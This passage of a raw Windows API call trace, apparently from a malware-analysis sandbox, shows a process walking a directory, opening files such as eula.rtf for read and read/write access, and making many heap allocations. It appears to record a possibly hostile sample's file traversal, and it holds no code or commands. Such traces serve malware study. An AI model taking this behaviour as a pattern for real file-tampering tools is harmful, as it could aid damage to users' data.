ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x4958)) returned 1 [0061.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x719c8 | out: hHeap=0x20000) returned 1 [0061.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0061.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.020] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.020] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x462f0, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓䥘")) returned 0 [0061.020] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0061.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfe0 [0061.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f0c8 [0061.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfe0 | out: hHeap=0x20000) returned 1 [0061.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f0c8 | out: hHeap=0x20000) returned 1 [0061.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53370 | out: hHeap=0x20000) returned 1 [0061.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0061.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46828 | out: hHeap=0x20000) returned 1 [0061.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0061.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf10 [0061.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.020] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.020] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0061.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0061.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.021] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.021] AreFileApisANSI () returned 1 [0061.021] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1040", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1040", lpUsedDefaultChar=0x0) returned 27 [0061.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0061.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.021] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0061.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfd0 [0061.021] AreFileApisANSI () returned 1 [0061.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.021] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0061.021] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040") returned 27 [0061.021] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040" (normalized: "c:\\588bce7c90097ed212\\1040"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.021] GetLastError () returned 0x5 [0061.021] GetLastError () returned 0x5 [0061.021] SetLastError (dwErrCode=0x5) [0061.021] GetLastError () returned 0x5 [0061.021] SetLastError (dwErrCode=0x5) [0061.022] GetLastError () returned 0x5 [0061.022] SetLastError (dwErrCode=0x5) [0061.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0061.022] AreFileApisANSI () returned 1 [0061.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0061.022] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88798, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040") returned 27 [0061.022] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040" (normalized: "c:\\588bce7c90097ed212\\1040"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.022] GetLastError () returned 0x5 [0061.022] GetLastError () returned 0x5 [0061.022] SetLastError (dwErrCode=0x5) [0061.022] GetLastError () returned 0x5 [0061.022] SetLastError (dwErrCode=0x5) [0061.022] GetLastError () returned 0x5 [0061.022] SetLastError (dwErrCode=0x5) [0061.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0061.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfd0 | out: hHeap=0x20000) returned 1 [0061.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0061.022] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.022] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.022] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.022] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0061.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68d60 [0061.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0061.022] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0061.022] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0061.023] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf371c69a, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="1041", cAlternateFileName="")) returned 1 [0061.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf20 [0061.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.023] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x533b8 [0061.023] FindFirstFileExW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\*", fInfoLevelId=0x0, lpFindFileData=0x313ef40, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x0 | out: lpFindFileData=0x313ef40) returned 0x78f10 [0061.023] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0061.023] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313ecc4 | out: lpFindFileData=0x313ecc4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe3b, dwReserved0=0x0, dwReserved1=0x0, cFileName="eula.rtf", cAlternateFileName="")) returned 1 [0061.023] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x533b8 | out: hHeap=0x20000) returned 1 [0061.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88748 [0061.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88748 | out: hHeap=0x20000) returned 1 [0061.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88770 [0061.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0061.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x68) returned 0x45f68 [0061.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0061.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0061.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf00 [0061.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0061.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88630 [0061.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5e) returned 0x71960 [0061.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88630 | out: hHeap=0x20000) returned 1 [0061.024] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x50) returned 0x6d2c0 [0061.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.024] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6d2c0 | out: hHeap=0x20000) returned 1 [0061.024] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.024] AreFileApisANSI () returned 1 [0061.025] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1040\\eula.rtf", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1040\\eula.rtf", lpUsedDefaultChar=0x0) returned 36 [0061.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.025] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.025] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0061.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf00 [0061.025] AreFileApisANSI () returned 1 [0061.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.025] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68f40 [0061.025] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x68f40, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 36 [0061.025] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.026] GetFileType (hFile=0x428) returned 0x1 [0061.026] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.026] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.026] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.026] SetFilePointerEx (in: hFile=0x428, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.026] CloseHandle (hObject=0x428) returned 1 [0061.026] AreFileApisANSI () returned 1 [0061.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.026] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68d60 [0061.026] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x68d60, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 36 [0061.027] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x428 [0061.027] GetFileType (hFile=0x428) returned 0x1 [0061.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68d60 | out: hHeap=0x20000) returned 1 [0061.027] CloseHandle (hObject=0x428) returned 1 [0061.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0061.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e030 [0061.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e110 | out: hHeap=0x20000) returned 1 [0061.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0061.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88810 [0061.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0061.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88810 | out: hHeap=0x20000) returned 1 [0061.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0061.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88720 [0061.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88388 [0061.027] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0061.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88388 | out: hHeap=0x20000) returned 1 [0061.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88720 | out: hHeap=0x20000) returned 1 [0061.027] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0061.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0061.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0061.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0061.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0061.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0061.028] AreFileApisANSI () returned 1 [0061.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 36 [0061.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x48) returned 0x68b80 [0061.028] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x68b80, cchWideChar=36 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1040\\eula.rtf") returned 36 [0061.028] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1040\\eula.rtf" (normalized: "c:\\588bce7c90097ed212\\1040\\eula.rtf"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x69d9e300, ftCreationTime.dwHighDateTime=0x1cac0d3, ftLastAccessTime.dwLowDateTime=0x69d9e300, ftLastAccessTime.dwHighDateTime=0x1cac0d3, ftLastWriteTime.dwLowDateTime=0x69d9e300, ftLastWriteTime.dwHighDateTime=0x1cac0d3, nFileSizeHigh=0x0, nFileSizeLow=0xe3b)) returned 1 [0061.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68b80 | out: hHeap=0x20000) returned 1 [0061.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0061.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0061.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.028] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.028] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.028] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0x138bc, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="LocalizedData.xml", cAlternateFileName="LOCALI~1.XML")) returned 1 [0061.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88518 [0061.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88518 | out: hHeap=0x20000) returned 1 [0061.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e110 [0061.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.028] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e180 [0061.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88770 | out: hHeap=0x20000) returned 1 [0061.028] HeapFree (in: hHeap=0x20000, dwFlags=0x0, 